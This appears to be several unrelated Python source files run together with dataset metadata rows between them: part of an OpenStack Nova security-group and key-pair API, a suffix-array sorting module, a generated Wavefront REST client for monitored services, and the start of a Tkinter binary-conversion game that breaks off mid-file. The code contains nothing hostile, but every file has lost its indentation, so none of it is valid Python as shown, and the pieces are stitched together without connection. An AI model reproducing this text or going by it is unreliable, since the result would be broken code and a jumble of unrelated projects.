def delete_key_pair(self, context, user_id, key_name):
"""Delete a keypair by name."""
self._notify(context, 'delete.start', key_name)
objects.KeyPair.destroy_by_name(context, user_id, key_name)
self._notify(context, 'delete.end', key_name)
def get_key_pairs(self, context, user_id):
"""List key pairs."""
return objects.KeyPairList.get_by_user(context, user_id)
def get_key_pair(self, context, user_id, key_name):
"""Get a keypair by name."""
return objects.KeyPair.get_by_name(context, user_id, key_name)
class SecurityGroupAPI(base.Base, security_group_base.SecurityGroupBase):
"""Sub-set of the Compute API related to managing security groups
and security group rules
"""
# The nova security group api does not use a uuid for the id.
id_is_uuid = False
def __init__(self, **kwargs):
super(SecurityGroupAPI, self).__init__(**kwargs)
self.security_group_rpcapi = compute_rpcapi.SecurityGroupAPI()
def validate_property(self, value, property, allowed):
"""Validate given security group property.
:param value: the value to validate, as a string or unicode
:param property: the property, either 'name' or 'description'
:param allowed: the range of characters allowed
"""
try:
val = value.strip()
except AttributeError:
msg = _("Security group %s is not a string or unicode") % property
self.raise_invalid_property(msg)
utils.check_string_length(val, name=property, min_length=1,
max_length=255)
if allowed and not re.match(allowed, val):
# Some validation to ensure that values match API spec.
# - Alphanumeric characters, spaces, dashes, and underscores.
# TODO(Daviey): LP: #813685 extend beyond group_name checking, and
# probably create a param validator that can be used elsewhere.
msg = (_("Value (%(value)s) for parameter Group%(property)s is "
"invalid. Content limited to '%(allowed)s'.") %
{'value': value, 'allowed': allowed,
'property': property.capitalize()})
self.raise_invalid_property(msg)
def ensure_default(self, context):
"""Ensure that a context has a security group.
Creates a security group for the security context if it does not
already exist.
:param context: the security context
"""
self.db.security_group_ensure_default(context)
def create_security_group(self, context, name, description):
try:
reservations = QUOTAS.reserve(context, security_groups=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many security groups.")
self.raise_over_quota(msg)
LOG.audit(_("Create Security Group %s"), name, context=context)
try:
self.ensure_default(context)
group = {'user_id': context.user_id,
'project_id': context.project_id,
'name': name,
'description': description}
try:
group_ref = self.db.security_group_create(context, group)
except exception.SecurityGroupExists:
msg = _('Security group %s already exists') % name
self.raise_group_already_exists(msg)
# Commit the reservation
QUOTAS.commit(context, reservations)
except Exception:
with excutils.save_and_reraise_exception():
QUOTAS.rollback(context, reservations)
return group_ref
def update_security_group(self, context, security_group,
name, description):
if security_group['name'] in RO_SECURITY_GROUPS:
msg = (_("Unable to update system group '%s'") %
security_group['name'])
self.raise_invalid_group(msg)
group = {'name': name,
'description': description}
columns_to_join = ['rules.grantee_group']
group_ref = self.db.security_group_update(context,
security_group['id'],
group,
columns_to_join=columns_to_join)
return group_ref
def get(self, context, name=None, id=None, map_exception=False):
self.ensure_default(context)
try:
if name:
return self.db.security_group_get_by_name(context,
context.project_id,
name)
elif id:
return self.db.security_group_get(context, id)
except exception.NotFound as exp:
if map_exception:
msg = exp.format_message()
self.raise_not_found(msg)
else:
raise
def list(self, context, names=None, ids=None, project=None,
search_opts=None):
self.ensure_default(context)
groups = []
if names or ids:
if names:
for name in names:
groups.append(self.db.security_group_get_by_name(context,
project,
name))
if ids:
for id in ids:
groups.append(self.db.security_group_get(context, id))
elif context.is_admin:
# TODO(eglynn): support a wider set of search options than just
# all_tenants, at least include the standard filters defined for
# the EC2 DescribeSecurityGroups API for the non-admin case also
if (search_opts and 'all_tenants' in search_opts):
groups = self.db.security_group_get_all(context)
else:
groups = self.db.security_group_get_by_project(context,
project)
elif project:
groups = self.db.security_group_get_by_project(context, project)
return groups
def destroy(self, context, security_group):
if security_group['name'] in RO_SECURITY_GROUPS:
msg = _("Unable to delete system group '%s'") % \
security_group['name']
self.raise_invalid_group(msg)
if self.db.security_group_in_use(context, security_group['id']):
msg = _("Security group is still in use")
self.raise_invalid_group(msg)
quotas = objects.Quotas()
quota_project, quota_user = quotas_obj.ids_from_security_group(
context, security_group)
try:
quotas.reserve(context, project_id=quota_project,
user_id=quota_user, security_groups=-1)
except Exception:
LOG.exception(_LE("Failed to update usages deallocating "
"security group"))
LOG.audit(_("Delete security group %s"), security_group['name'],
context=context)
self.db.security_group_destroy(context, security_group['id'])
# Commit the reservations
quotas.commit()
def is_associated_with_server(self, security_group, instance_uuid):
"""Check if the security group is already associated
with the instance. If Yes, return True.
"""
if not security_group:
return False
instances = security_group.get('instances')
if not instances:
return False
for inst in instances:
if (instance_uuid == inst['uuid']):
return True
return False
@wrap_check_security_groups_policy
def add_to_instance(self, context, instance, security_group_name):
"""Add security group to the instance."""
security_group = self.db.security_group_get_by_name(context,
context.project_id,
security_group_name)
instance_uuid = instance['uuid']
# check if the security group is associated with the server
if self.is_associated_with_server(security_group, instance_uuid):
raise exception.SecurityGroupExistsForInstance(
security_group_id=security_group['id'],
instance_id=instance_uuid)
self.db.instance_add_security_group(context.elevated(),
instance_uuid,
security_group['id'])
# NOTE(comstud): No instance_uuid argument to this compute manager
# call
self.security_group_rpcapi.refresh_security_group_rules(context,
security_group['id'], host=instance['host'])
@wrap_check_security_groups_policy
def remove_from_instance(self, context, instance, security_group_name):
"""Remove the security group associated with the instance."""
security_group = self.db.security_group_get_by_name(context,
context.project_id,
security_group_name)
instance_uuid = instance['uuid']
# check if the security group is associated with the server
if not self.is_associated_with_server(security_group, instance_uuid):
raise exception.SecurityGroupNotExistsForInstance(
security_group_id=security_group['id'],
instance_id=instance_uuid)
self.db.instance_remove_security_group(context.elevated(),
instance_uuid,
security_group['id'])
# NOTE(comstud): No instance_uuid argument to this compute manager
# call
self.security_group_rpcapi.refresh_security_group_rules(context,
security_group['id'], host=instance['host'])
def get_rule(self, context, id):
self.ensure_default(context)
try:
return self.db.security_group_rule_get(context, id)
except exception.NotFound:
msg = _("Rule (%s) not found") % id
self.raise_not_found(msg)
def add_rules(self, context, id, name, vals):
"""Add security group rule(s) to security group.
Note: the Nova security group API doesn't support adding multiple
security group rules at once but the EC2 one does. Therefore,
this function is written to support both.
"""
count = QUOTAS.count(context, 'security_group_rules', id)
try:
projected = count + len(vals)
QUOTAS.limit_check(context, security_group_rules=projected)
except exception.OverQuota:
msg = _("Quota exceeded, too many security group rules.")
self.raise_over_quota(msg)
msg = _("Security group %(name)s added %(protocol)s ingress "
"(%(from_port)s:%(to_port)s)")
rules = []
for v in vals:
rule = self.db.security_group_rule_create(context, v)
rules.append(rule)
LOG.audit(msg, {'name': name,
'protocol': rule.protocol,
'from_port': rule.from_port,
'to_port': rule.to_port})
self.trigger_rules_refresh(context, id=id)
return rules
def remove_rules(self, context, security_group, rule_ids):
msg = _("Security group %(name)s removed %(protocol)s ingress "
"(%(from_port)s:%(to_port)s)")
for rule_id in rule_ids:
rule = self.get_rule(context, rule_id)
LOG.audit(msg, {'name': security_group['name'],
'protocol': rule.protocol,
'from_port': rule.from_port,
'to_port': rule.to_port})
self.db.security_group_rule_destroy(context, rule_id)
# NOTE(vish): we removed some rules, so refresh
self.trigger_rules_refresh(context, id=security_group['id'])
def remove_default_rules(self, context, rule_ids):
for rule_id in rule_ids:
self.db.security_group_default_rule_destroy(context, rule_id)
def add_default_rules(self, context, vals):
rules = [self.db.security_group_default_rule_create(context, v)
for v in vals]
return rules
def default_rule_exists(self, context, values):
"""Indicates whether the specified rule values are already
defined in the default security group rules.
"""
for rule in self.db.security_group_default_rule_list(context):
keys = ('cidr', 'from_port', 'to_port', 'protocol')
for key in keys:
if rule.get(key) != values.get(key):
break
else:
return rule.get('id') or True
return False
def get_all_default_rules(self, context):
try:
rules = self.db.security_group_default_rule_list(context)
except Exception:
msg = 'cannot get default security group rules'
raise exception.SecurityGroupDefaultRuleNotFound(msg)
return rules
def get_default_rule(self, context, id):
try:
return self.db.security_group_default_rule_get(context, id)
except exception.NotFound:
msg = _("Rule (%s) not found") % id
self.raise_not_found(msg)
def validate_id(self, id):
try:
return int(id)
except ValueError:
msg = _("Security group id should be integer")
self.raise_invalid_property(msg)
def trigger_rules_refresh(self, context, id):
"""Called when a rule is added to or removed from a security_group."""
security_group = self.db.security_group_get(
context, id, columns_to_join=['instances'])
for instance in security_group['instances']:
if instance['host'] is not None:
self.security_group_rpcapi.refresh_instance_security_rules(
context, instance['host'], instance)
def trigger_members_refresh(self, context, group_ids):
"""Called when a security group gains a new or loses a member.
Sends an update request to each compute node for each instance for
which this is relevant.
"""
# First, we get the security group rules that reference these groups as
# the grantee..
security_group_rules = set()
for group_id in group_ids:
security_group_rules.update(
self.db.security_group_rule_get_by_security_group_grantee(
context,
group_id))
# ..then we distill the rules into the groups to which they belong..
security_groups = set()
for rule in security_group_rules:
security_group = self.db.security_group_get(
context, rule['parent_group_id'],
columns_to_join=['instances'])
security_groups.add(security_group)
# ..then we find the instances that are members of these groups..
instances = {}
for security_group in security_groups:
for instance in security_group['instances']:
if instance['uuid'] not in instances:
instances[instance['uuid']] = instance
# ..then we send a request to refresh the rules for each instance.
for instance in instances.values():
if instance['host']:
self.security_group_rpcapi.refresh_instance_security_rules(
context, instance['host'], instance)
def get_instance_security_groups(self, context, instance_uuid,
detailed=False):
if detailed:
return self.db.security_group_get_by_instance(context,
instance_uuid)
instance = objects.Instance(uuid=instance_uuid)
groups = objects.SecurityGroupList.get_by_instance(context, instance)
return [{'name': group.name} for group in groups]
def populate_security_groups(self, instance, security_groups):
if not security_groups:
# Make sure it's an empty list and not None
security_groups = []
instance.security_groups = security_group_obj.make_secgroup_list(
security_groups)
| apache-2.0 | -3,211,940,341,219,386,400 | 42.827224 | 79 | 0.572474 | false |
gnarph/DIRT | utilities/suffix_array/tools_karkkainen_sanders.py | 1 | 4256 | # -*- coding: utf-8 -*-
"""
Originally from https://code.google.com/p/pysuffix/
Used from https://github.com/baiyubin/pysuffix
"""
from array import array
def radix_pass(a, b, r, n, k):
"""
:param a: word to sort
:param b: sorted words
:param r: initial string
:param n: input size
:param k: alphabet size
"""
c = array("i", [0] * (k + 1))
for i in xrange(n):
c[r[a[i]]] += 1
somme = 0
for i in xrange(k + 1):
freq, c[i] = c[i], somme
somme += freq
for i in xrange(n):
b[c[r[a[i]]]] = a[i]
c[r[a[i]]] += 1
def simple_kark_sort(s):
alphabet = [None] + sorted(set(s))
k = len(alphabet)
alphabet_indices = {c: i for i, c in enumerate(alphabet)}
n = len(s)
sa = array('i', [0] * (n + 3))
s = array('i', [alphabet_indices[c] for c in s] + [0] * 3)
kark_sort(s, sa, n, k)
return sa
def kark_sort(to_sort, result, n, alphabet_size):
"""s : word to sort
SA : result
n : len of s
K : alphabet size"""
n0 = (n + 2) / 3
n1 = (n + 1) / 3
n2 = n / 3
n02 = n0 + n2
sa_12 = array('i', [0] * (n02 + 3))
sa_0 = array('i', [0] * n0)
s12 = [i for i in xrange(n + (n0 - n1)) if i % 3]
s12.extend([0] * 3)
s12 = array('i', s12)
radix_pass(s12, sa_12, to_sort[2:], n02, alphabet_size)
radix_pass(sa_12, s12, to_sort[1:], n02, alphabet_size)
radix_pass(s12, sa_12, to_sort, n02, alphabet_size)
name = 0
c0, c1, c2 = -1, -1, -1
for i in xrange(n02):
if to_sort[sa_12[i]] != c0 or to_sort[sa_12[i] + 1] != c1 or to_sort[sa_12[i] + 2] != c2:
name += 1
c0 = to_sort[sa_12[i]]
c1 = to_sort[sa_12[i] + 1]
c2 = to_sort[sa_12[i] + 2]
if sa_12[i] % 3 == 1:
s12[sa_12[i] / 3] = name
else:
s12[sa_12[i] / 3 + n0] = name
if name < n02:
kark_sort(s12, sa_12, n02, name + 1)
for i in xrange(n02):
s12[sa_12[i]] = i + 1
else:
for i in xrange(n02):
sa_12[s12[i] - 1] = i
s0 = array('i', [sa_12[i] * 3 for i in xrange(n02) if sa_12[i] < n0])
radix_pass(s0, sa_0, to_sort, n0, alphabet_size)
p = j = alphabet_size = 0
t = n0 - n1
while alphabet_size < n:
if sa_12[t] < n0:
i = sa_12[t] * 3 + 1
else:
i = (sa_12[t] - n0) * 3 + 2
j = sa_0[p] if p < n0 else 0
if sa_12[t] < n0:
if to_sort[i] == to_sort[j]:
test = s12[sa_12[t] + n0] <= s12[j / 3]
else:
test = to_sort[i] < to_sort[j]
elif to_sort[i] == to_sort[j]:
if to_sort[i + 1] == to_sort[j + 1]:
test = s12[sa_12[t] - n0 + 1] <= s12[j / 3 + n0]
else:
test = to_sort[i + 1] < to_sort[j + 1]
else:
test = to_sort[i] < to_sort[j]
if test:
result[alphabet_size] = i
t += 1
if t == n02:
alphabet_size += 1
while p < n0:
result[alphabet_size] = sa_0[p]
p += 1
alphabet_size += 1
else:
result[alphabet_size] = j
p += 1
if p == n0:
alphabet_size += 1
while t < n02:
if sa_12[t] < n0:
result[alphabet_size] = (sa_12[t] * 3) + 1
else:
result[alphabet_size] = ((sa_12[t] - n0) * 3) + 2
t += 1
alphabet_size += 1
alphabet_size += 1
def longest_common_prefixes(s, suffix_array):
"""
return LCP array that LCP[i] is the longest common prefix
between s[SA[i]] and s[SA[i+1]]
"""
n = len(s)
rank = array('i', [0] * n)
lcp = array('i', [0] * n)
for i in xrange(n):
rank[suffix_array[i]] = i
l = 0
for j in xrange(n):
l = max(0, l - 1)
i = rank[j]
j2 = suffix_array[i - 1]
if i:
while l + j < n and l + j2 < n and s[j + l] == s[j2 + l]:
l += 1
lcp[i - 1] = l
else:
l = 0
return lcp
| mit | -6,020,669,317,332,890,000 | 28.150685 | 97 | 0.426692 | false |
wavefrontHQ/python-client | wavefront_api_client/api/monitored_service_api.py | 1 | 22234 | # coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MonitoredServiceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def batch_update(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.batch_update_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.batch_update_with_http_info(**kwargs) # noqa: E501
return data
def batch_update_with_http_info(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method batch_update" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/services', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainer', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_services(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_services_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_services_with_http_info(**kwargs) # noqa: E501
return data
def get_all_services_with_http_info(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_services" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_service(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def get_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `get_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_services_of_application(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
else:
(data) = self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
return data
def get_services_of_application_with_http_info(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application_with_http_info(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_services_of_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_services_of_application`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_service(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def update_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `update_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `update_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| apache-2.0 | 2,556,072,987,155,370,000 | 40.097967 | 443 | 0.588153 | false |
RichieStacker/bingame | bingame_forms.py | 1 | 9548 | # Number-to-binary game
# Copyright (C) 2013 Jonathan Humphreys
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import random, Tkinter
from bingame_maths import get_remainder, half_number
from bingame_grading import grade
# Class to store data relevant to this form.
# error_count will need to be accessible from outside this form, though.
class GameMain():
def __init__(self, forms, apps):
self.forms = forms # Need to carry the whole dictionary across every damn class.
self.apps = apps
self.parent = self.forms["root"] # root is the parent of all widgets created in this class.
self.number = random.randint(1, 2048) # Randomly generated, between 1 and 2048. The player must gradually find the binary value of this number.
self.progress = self.number # The current number that must be divided by 2 to continue. Initially the same as "number".
self.answer = 0 # The player's answer.
self.remainder = 0 # The remainder from their answer. Can only ever be 1 or 0.
self.answer_chain = [] # Stores each answer and its remainder and is recited with each step.
self.error_count = 0 # Counts the number of errors a player makes in the process of a conversion.
self.init_ui()
# Configures the window to the appropriate paramaters.
def init_ui(self):
self.parent.title("Convert to Binary") # Sets the window title.
self.parent.geometry("200x300+400+150") # Sets the window size (200x300), as well as its position (numbers preceded by plus signs).
# Canvas upon which to output the answer chain.
self.canAnswers = Tkinter.Canvas(self.parent, bg = "#EEEEEE")
self.canAnswers.place(bordermode = "outside", x = 5, y = 5, width = 190, height = 190)
# Label to visually idenitfy the error counter.
self.lblErrorsTag = Tkinter.Label(self.parent, anchor = "w", text = "Errors:")
self.lblErrorsTag.place(bordermode = "outside", x = 5, y = 200, width = 145, height = 25)
# The error counter itself. It's a label, so requires a StringVar to be assigned to the widget's 'textvariable' property.
# It's awkward like that.
self.error_value = Tkinter.StringVar()
self.error_value.set(str(self.error_count))
self.lblErrors = Tkinter.Label(self.parent, anchor = "w", textvariable = self.error_value)
self.lblErrors.place(bordermode = "outside", x = 155, y = 200, width = 40, height = 25)
# Label to hold the last correct answer. Saves some confusion by having it right next to the answer entry boxes.
self.last_answer_value = Tkinter.StringVar()
self.last_answer_value.set(str(self.progress))
self.lblLastAnswer = Tkinter.Label(self.parent, anchor = "w", textvariable = self.last_answer_value)
self.lblLastAnswer.place(bordermode = "outside", x = 5, y = 230, width = 60, height = 25)
# Entry box to accept the answer rounded down to the neared whole.
